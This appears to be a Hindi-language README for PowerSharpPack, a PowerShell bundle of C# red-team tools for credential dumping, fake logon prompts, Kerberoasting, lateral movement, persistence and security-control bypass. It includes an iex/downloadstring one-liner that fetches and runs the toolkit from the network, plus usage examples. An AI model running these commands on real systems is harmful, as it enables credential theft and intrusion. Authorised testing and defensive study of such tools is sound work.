
PowerShell रैपर जो 50+ C# आक्रामक सुरक्षा उपकरणों को बंडल करता है, जो रेड टीम अभियानों में पोस्ट-एक्सप्लॉइटेशन, प्रिविलेज एस्केलेशन, क्रेडेंशियल डंपिंग, लेटरल मूवमेंट और एक्टिव डायरेक्टरी रिकॉनिसेंस के लिए उपयोग होते हैं।
कई उपयोगी आक्रामक CSharp प्रोजेक्ट्स को PowerShell में लपेटा गया है ताकि आसानी से उपयोग किया जा सके।
क्यों? मेरी व्यक्तिगत राय में आक्रामक PowerShell AMSI, Script-block-logging, Constrained Language Mode या अन्य सुरक्षा सुविधाओं के कारण मृत नहीं है। इनमें से किसी भी तंत्र को बायपास किया जा सकता है। चूंकि अधिकांश नए नवोन्मेषी आक्रामक सुरक्षा प्रोजेक्ट C# में लिखे जाते हैं, मैंने उन्हें PowerShell में भी उपयोगी बनाने का निर्णय लिया।
तो मैंने मूल रूप से यहाँ क्या किया?
[System.Reflection.Assembly]::Load($DecompressedDecodedBinary) के माध्यम से PowerShell में लोड करें।यह एक बहुत आसान लेकिन कई रेपो के लिए समय लेने वाली प्रक्रिया है।
कौन से उपकरण शामिल हैं?
Internalmonologue
Internal Monologue Attack: LSASS को छुए बिना NTLM हैश प्राप्त करना
@क्रेडिट: https://github.com/eladshamir/Internal-Monologue
Seatbelt
Seatbelt एक C# प्रोजेक्ट है जो सुरक्षा-उन्मुख होस्ट-सर्वेक्षण "सुरक्षा जाँच" करता है जो आक्रामक और रक्षात्मक दोनों सुरक्षा दृष्टिकोणों से प्रासंगिक हैं।
@क्रेडिट: https://github.com/GhostPack/Seatbelt
SharpWeb
.NET 2.0 CLR प्रोजेक्ट Google Chrome, Mozilla Firefox और Microsoft Internet Explorer/Edge से सहेजे गए ब्राउज़र क्रेडेंशियल्स प्राप्त करने के लिए।
@क्रेडिट: https://github.com/djhohnstein/SharpWeb
UrbanBishop
UrbanBishop में एक स्थानीय RW सेक्शन बनाता है और फिर उस सेक्शन को दूरस्थ प्रक्रिया में RX के रूप में मैप करता है। शेलकोड लोडिंग आसान हो गई।
@क्रेडिट: https://github.com/FuzzySecurity/Sharp-Suite
SharpUp
SharpUp विभिन्न PowerUp कार्यक्षमता का C# पोर्ट है।
@क्रेडिट: https://github.com/GhostPack/SharpUp
Rubeus
Rubeus कच्चे Kerberos इंटरैक्शन और दुरुपयोग के लिए C# टूलसेट है।
@क्रेडिट: https://github.com/GhostPack/Rubeus && https://github.com/gentilkiwi/kekeo/
SharPersist
Windows के लिए दृढ़ता टूलकिट C# में लिखा गया।
@क्रेडिट: https://github.com/fireeye/SharPersist
Sharpview
harmj0y के PowerView का C# कार्यान्वयन
@क्रेडिट: https://github.com/tevora-threat/SharpView
winPEAS
book.hacktricks.xyz से स्थानीय Windows विशेषाधिकार वृद्धि चेकलिस्ट की जाँच करें।
@क्रेडिट: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
Lockless
Lockless लॉक की गई फाइलों की प्रतिलिपि बनाने की अनुमति देता है।
@क्रेडिट: https://github.com/GhostPack/Lockless
SharpChromium
.NET 4.0 CLR प्रोजेक्ट क्रोमियम डेटा, जैसे कुकीज़, इतिहास और सहेजे गए लॉगिन प्राप्त करने के लिए।
@क्रेडिट: https://github.com/djhohnstein/SharpChromium
SharpDPAPI
SharpDPAPI कुछ Mimikatz DPAPI कार्यक्षमता का C# पोर्ट है।
@क्रेडिट: https://github.com/GhostPack/SharpDPAPI && https://github.com/gentilkiwi/mimikatz/
SharpShares
वर्तमान डोमेन में सभी नेटवर्क शेयरों की गणना करें। साथ ही, नामों को IP पतों में हल कर सकता है।
@क्रेडिट: https://github.com/djhohnstein/SharpShares
SharpSniper
उनके उपयोगकर्ता नाम और लॉगऑन IP पते के माध्यम से सक्रिय निर्देशिका में विशिष्ट उपयोगकर्ता खोजें।
@क्रेडिट: https://github.com/HunnicCyber/SharpSniper
SharpSpray
SharpSpray एक सरल कोड सेट है जो LDAP का उपयोग करके किसी डोमेन के सभी उपयोगकर्ताओं के विरुद्ध पासवर्ड स्प्रेइंग हमला करने के लिए और Cobalt Strike के साथ संगत है।
@क्रेडिट: https://github.com/jnqpblc/SharpSpray
Watson
लापता KBs की गणना करें और उपयोगी विशेषाधिकार वृद्धि कमजोरियों के लिए एक्सप्लॉइट्स सुझाएं।
@क्रेडिट: https://github.com/rasta-mouse/Watson
Grouper2
AD समूह नीति में कमजोरियां खोजें।
@क्रेडिट: https://github.com/l0ss/Grouper2
Tokenvator
Windows टोकन के साथ विशेषाधिकार बढ़ाने का उपकरण।
@क्रेडिट: https://github.com/0xbadjuju/Tokenvator
SauronEye
विशिष्ट शब्दों वाली विशिष्ट फाइलों को खोजने का उपकरण, यानी पासवर्ड वाली फाइलें।
@क्रेडिट: https://github.com/vivami/SauronEye
बस मुख्य स्क्रिप्ट को लोड करें
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpPack.ps1')
और उपकरण को स्विच पैरामीटर के रूप में चुनें, उदाहरण के लिए:
PowerSharpPack -seatbelt -Command "AMSIProviders"
यदि आप बाइनरी को एकाधिक पैरामीटर पास करना चाहते हैं तो आप उद्धरण चिह्नों का उपयोग कर सकते हैं जैसे:
PowerSharpPack -Rubeus -Command "kerberoast /outfile:Roasted.txt"
यदि आप कारणों से सभी बाइनरी लोड नहीं करना चाहते हैं, तो आप PowerSharpBinaries फ़ोल्डर में स्थित प्रति बाइनरी PowerShell स्क्रिप्ट का उपयोग कर सकते हैं।
वे प्रोजेक्ट जो स्टैंडअलोन PowerShell स्क्रिप्ट के रूप में भी उपलब्ध हैं:
SharpCloud
AWS, Microsoft Azure और Google Compute से संबंधित क्रेडेंशियल फाइलों की उपस्थिति की जाँच करने के लिए सरल C#।
@क्रेडिट: https://github.com/chrismaddalena/SharpCloud
SharpSSDP
SSDP सेवा खोज
@क्रेडिट: https://github.com/rvrsh3ll/SharpSSDP
DAFT
DAFT: डेटाबेस ऑडिट फ्रेमवर्क और टूलकिट
@क्रेडिट: https://github.com/NetSPI/DAFT
Get-RBCD-Threaded
सक्रिय निर्देशिका वातावरण में संसाधन-आधारित प्रतिबंधित प्रतिनिधिमंडल हमले के पथ खोजने का उपकरण।
@क्रेडिट: https://github.com/FatRodzianko/Get-RBCD-Threaded
SharpGPO-RemoteAccessPolicies
समूह नीति के माध्यम से दूरस्थ पहुँच नीतियों की गणना करने के लिए एक C# उपकरण।
@क्रेडिट: https://github.com/FSecureLABS/SharpGPO-RemoteAccessPolicies
SharpAllowedToAct
संसाधन-आधारित प्रतिबंधित प्रतिनिधिमंडल (msDS-AllowedToActOnBehalfOfOtherIdentity) के माध्यम से कंप्यूटर ऑब्जेक्ट का अधिग्रहण।
@क्रेडिट: https://github.com/pkb1s/SharpAllowedToAct
WireTap
.NET 4.0 प्रोजेक्ट वीडियो, ऑडियो और कीबोर्ड हार्डवेयर के साथ बातचीत करने के लिए।
@क्रेडिट: https://github.com/djhohnstein/WireTap
SharpClipboard
C# क्लिपबोर्ड मॉनिटर
@क्रेडिट: https://github.com/slyd0g/SharpClipboard
SharpPrinter
प्रिंटर खोजें + कमजोरियों की जाँच करें।
@क्रेडिट: https://github.com/rvrsh3ll/SharpPrinter
SharpHide
छिपी हुई रजिस्ट्री कुंजियाँ बनाने का उपकरण।
@क्रेडिट: https://github.com/outflanknl/SharpHide
SpoolSample
MS-RPRN RPC इंटरफ़ेस के माध्यम से Windows होस्ट को अन्य मशीनों में प्रमाणित करने के लिए मजबूर करने का PoC उपकरण। यह अन्य प्रोटोकॉल के माध्यम से भी संभव है।
@क्रेडिट: https://github.com/leechristensen/SpoolSample
SharpGPOAbuse
SharpGPOAbuse एक .NET एप्लिकेशन है जो C# में लिखा गया है जिसका उपयोग किसी समूह नीति वस्तु (GPO) पर उपयोगकर्ता के संपादन अधिकारों का लाभ उठाकर उस GPO द्वारा नियंत्रित वस्तुओं से समझौता करने के लिए किया जा सकता है।
@क्रेडिट: https://github.com/FSecureLABS/SharpGPOAbuse
SharpDump
SharpDump PowerSploit के Out-Minidump.ps1 कार्यक्षमता का C# पोर्ट है।
@क्रेडिट: https://github.com/GhostPack/SharpDump
SharpHound3
BloodHound प्रोजेक्ट के लिए C# डेटा संग्राहक, संस्करण 3
@क्रेडिट: https://github.com/BloodHoundAD/SharpHound3
PostDump
LSASS प्रक्रिया का मिनीडंप करने के लिए एक और उपकरण जो पहचान से बचने के लिए कुछ तकनीकों का उपयोग करता है।
@क्रेडिट: https://github.com/YOLOP0wn/POSTDump
SharpLocker
SharpLocker एक नकली Windows लॉक स्क्रीन पॉप करके वर्तमान उपयोगकर्ता क्रेडेंशियल प्राप्त करने में मदद करता है, सभी आउटपुट कंसोल पर भेजा जाता है जो Cobalt Strike के लिए एकदम सही काम करता है।
@क्रेडिट: https://github.com/Pickfordmatt/SharpLocker
Eyewitness
EyeWitness वेबसाइटों के स्क्रीनशॉट लेने, कुछ सर्वर हेडर जानकारी प्रदान करने और यदि संभव हो तो डिफ़ॉल्ट क्रेडेंशियल की पहचान करने के लिए डिज़ाइन किया गया है।
@क्रेडिट: https://github.com/FortyNorthSecurity/EyeWitness
FakeLogonScreen
पासवर्ड चुराने के लिए नकली Windows लॉगॉन स्क्रीन
@क्रेडिट: https://github.com/bitsadmin/fakelogonscreen
P0wnedShell
PowerShell रनस्पेस पोस्ट-एक्सप्लॉइटेशन टूलकिट
@क्रेडिट: https://github.com/Cn33liz/p0wnedShell
Safetykatz
SafetyKatz @gentilkiwi के Mimikatz प्रोजेक्ट और @subTee के .NET PE लोडर के थोड़े संशोधित संस्करण का संयोजन है मैंने इसे अपने स्वयं के अस्पष्ट Mimikatz संस्करण के साथ फिर से संशोधित किया।
@क्रेडिट: https://github.com/GhostPack/SafetyKatz
InveighZero
Windows C# LLMNR/mDNS/NBNS/DNS/DHCPv6 स्पूफर/मैन-इन-द-मिडिल उपकरण .
@क्रेडिट: https://github.com/Kevin-Robertson/InveighZero
SharpSploit
SharpSploit एक .NET पोस्ट-एक्सप्लॉइटेशन लाइब्रेरी है जो C# में लिखी गई है।
@क्रेडिट: https://github.com/cobbr/SharpSploit
Snaffler
पेंटेस्टर्स के लिए स्वादिष्ट कैंडी खोजने में मदद करने वाला उपकरण, @l0ss और @Sh3r4 ( ट्विटर: @/mikeloss और @/sh3r4_hax ) द्वारा।
@क्रेडिट: https://github.com/SnaffCon/Snaffler
BadPotato
itm4ns Printspoofer C# में।
@क्रेडिट: https://github.com/BeichenDream/BadPotato
BetterSafetyKatz
SafetyKatz का फोर्क जो सीधे gentilkiwi GitHub रेपो से Mimikatz के नवीनतम पूर्व-संकलित रिलीज़ को गतिशील रूप से प्राप्त करता है, रनटाइम पैच हस्ताक्षर और PE-लोड को मेमोरी में करने के लिए SharpSploit DInvoke का उपयोग करता है।
@क्रेडिट: https://github.com/Flangvik/BetterSafetyKatz
SharpKatz
mimikatz sekurlsa::logonpasswords, sekurlsa::ekeys और lsadump::dcsync कमांड का C# पोर्ट।
@क्रेडिट: https://github.com/b4rtik/SharpKatz
Gopher
कम लटकते फलों की खोज करने का C# उपकरण।
@क्रेडिट: https://github.com/EncodeGroup/Gopher
SharpOxidResolver
AirBus Security/PingCastle से IOXIDResolver।
@क्रेडिट: https://github.com/vletoux/pingcastle/
SharpBlock
एंट्री पॉइंट निष्पादन को रोककर EDR के सक्रिय प्रोजेक्शन DLLs को बायपास करने की एक विधि।
@क्रेडिट: https://github.com/CCob/SharpBlock
SharpLoginPrompt
यह प्रोग्राम वर्तमान उपयोगकर्ता का उपयोगकर्ता नाम और पासवर्ड एकत्र करने के लिए एक लॉगिन प्रॉम्प्ट बनाता है। यह प्रोजेक्ट रेड टीम को lsass को छुए बिना और सिस्टम पर प्रशासक क्रेडेंशियल के बिना वर्तमान उपयोगकर्ता का उपयोगकर्ता नाम और पासवर्ड फिश करने की अनुमति देता है।
@क्रेडिट: https://github.com/shantanu561993/SharpLoginPrompt
ThunderFox
थंडरबर्ड और फायरफॉक्स से डेटा (संपर्क, ईमेल, इतिहास, कुकीज़ और क्रेडेंशियल) पुनर्प्राप्त करता है।
@क्रेडिट: https://github.com/V1V1/SharpScribbles
StickyNotesExtract
Windows स्टिकी नोट्स डेटाबेस से डेटा निकालता है। Windows 10 बिल्ड 1607 और उच्चतर पर काम करता है। यह प्रोजेक्ट किसी बाहरी निर्भरता पर निर्भर नहीं करता है।
@क्रेडिट: https://github.com/V1V1/SharpScribbles
SCShell
फाइललेस लेटरल मूवमेंट टूल जो कमांड चलाने के लिए ChangeServiceConfigA पर निर्भर करता है।
@क्रेडिट: https://github.com/Mr-Un1k0d3r/SCShell
SharpSecDump
impacket के secretsdump.py की रिमोट SAM + LSA सीक्रेट्स डंपिंग कार्यक्षमता का .Net पोर्ट।
@क्रेडिट: https://github.com/G0ldenGunSec/SharpSecDump
SharpHandler
यह प्रोजेक्ट lsass के खुले हैंडल को पार्स या मिनीडंप करने के लिए पुन: उपयोग करता है, इसलिए आपको इसके साथ बातचीत करने के लिए अपने स्वयं के lsass हैंडल का उपयोग करने की आवश्यकता नहीं है।
@क्रेडिट: https://github.com/jfmaes/SharpHandler
SharpRDP
प्रमाणित कमांड निष्पादन के लिए रिमोट डेस्कटॉप प्रोटोकॉल .NET कंसोल एप्लिकेशन।
@क्रेडिट: https://github.com/0xthirteen/SharpRDP
SharpMove
प्रमाणित दूरस्थ निष्पादन करने के लिए .NET प्रोजेक्ट।
@क्रेडिट: https://github.com/0xthirteen/SharpMove
SharpStay
दृढ़ता स्थापित करने के लिए .NET प्रोजेक्ट।
@क्रेडिट: https://github.com/0xthirteen/SharpStay
SharpPrintNightmare
PrintNightmare CVE-2021-1675/CVE-2021-34527 का C# कार्यान्वयन।
@क्रेडिट: https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare/SharpPrintNightmare
Certify
सक्रिय निर्देशिका प्रमाणपत्र दुरुपयोग।
@क्रेडिट: https://github.com/GhostPack/Certify
Farmer
Farmer Windows डोमेन में NetNTLM हैश एकत्र करने का एक प्रोजेक्ट है। Farmer एक स्थानीय WebDAV सर्वर बनाकर ऐसा करता है जो किसी भी कनेक्टिंग क्लाइंट से WebDAV Mini Redirector को प्रमाणित करने का कारण बनता है।
@क्रेडिट: https://github.com/mdsecactivebreach/Farmer
SharpBypassUAC
UAC बायपास के लिए C# उपकरण
@क्रेडिट: https://github.com/FatRodzianko/SharpBypassUAC
StandIn
StandIn एक छोटा .NET35/45 AD पोस्ट-एक्सप्लॉइटेशन टूलकिट है।
@क्रेडिट: https://github.com/FuzzySecurity/StandIn
Carbuncle
रेड टीम एंगेजमेंट के दौरान आउटलुक इंटरऑप के साथ बातचीत करने का उपकरण।
@क्रेडिट: https://github.com/checkymander/Carbuncle
Whisker
Whisker एक C# उपकरण है जो सक्रिय निर्देशिका उपयोगकर्ता और कंप्यूटर खातों को उनके msDS-KeyCredentialLink विशेषता में हेरफेर करके अधिग्रहण करने के लिए है, प्रभावी रूप से लक्ष्य खाते में "शैडो क्रेडेंशियल" जोड़ता है।
@क्रेडिट: https://github.com/eladshamir/Whisker
SharpLdapRelayScan
LdapRelayScan का C# पोर्ट
@क्रेडिट: https://github.com/klezVirus/SharpLdapRelayScan
LdapSignCheck
LDAP साइनिंग की जाँच करने का C# प्रोजेक्ट।
@क्रेडिट: https://github.com/cube0x0/LdapSignCheck
SharpImpersonation
SharpImpersonation - एक उपयोगकर्ता प्रतिरूपण उपकरण - टोकन या शेलकोड इंजेक्शन के माध्यम से।
@क्रेडिट: https://github.com/S3cur3Th1sSh1t/SharpImpersonation
SharpWSUS
SharpWSUS WSUS के माध्यम से पार्श्व आंदोलन के लिए एक CSharp उपकरण है। एक संबंधित ब्लॉग (https://labs.nettitude.com/blog/introducing-sharpwsus/) है जिसमें टूलिंग, उपयोग के मामले और पहचान के बारे में अधिक विस्तृत जानकारी है।
@क्रेडिट: https://github.com/nettitude/SharpWSUS
MalSCCM
यह उपकरण आपको स्थानीय या दूरस्थ SCCM सर्वरों का दुरुपयोग करके उनके द्वारा प्रबंधित होस्टों पर दुर्भावनापूर्ण एप्लिकेशन तैनात करने की अनुमति देता है। इस उपकरण का उपयोग करने के लिए आपकी वर्तमान प्रक्रिया में SCCM सर्वर पर व्यवस्थापक अधिकार होने चाहिए। आमतौर पर SCCM की तैनाती में प्रबंधन सर्वर और प्राथमिक सर्वर एक ही होस्ट पर होंगे, ऐसी स्थिति में locate कमांड से लौटाया गया होस्ट प्राथमिक सर्वर के रूप में उपयोग किया जा सकता है।
@क्रेडिट: https://github.com/nettitude/MalSCCM
KrbRelay
Kerberos रिले करने के लिए फ्रेमवर्क
@क्रेडिट: https://github.com/cube0x0/KrbRelay
SharpSCCM
SCCM के साथ बातचीत करने के लिए एक C# उपयोगिता
@क्रेडिट: https://github.com/Mayyhem/SharpSCCM
ShadowSpray
एक उपकरण जो पूरे डोमेन में शैडो क्रेडेंशियल्स स्प्रे करता है, डोमेन में अन्य वस्तुओं पर भूल गए GenericWrite/GenericAll DACLs का दुरुपयोग करने की उम्मीद में।
@क्रेडिट: https://github.com/Dec0ne/ShadowSpray
Grouper3
AD समूह नीति में कमजोरियां खोजें, लेकिन इसे Grouper2 से बेहतर करें।
@क्रेडिट: https://github.com/Group3r/Group3r
HandleKatz
क्लोन किए गए हैंडल का उपयोग करके PIC lsass डंपर
@क्रेडिट: https://github.com/codewhitesec/HandleKatz
NanoDump
LSASS को डंप करें जैसा आप चाहते हैं
@क्रेडिट: https://github.com/helpsystems/nanodump
PPLDump
उपयोगकर्तालैंड एक्सप्लॉइट के साथ PPL की मेमोरी डंप करें
@क्रेडिट: https://github.com/itm4n/PPLdump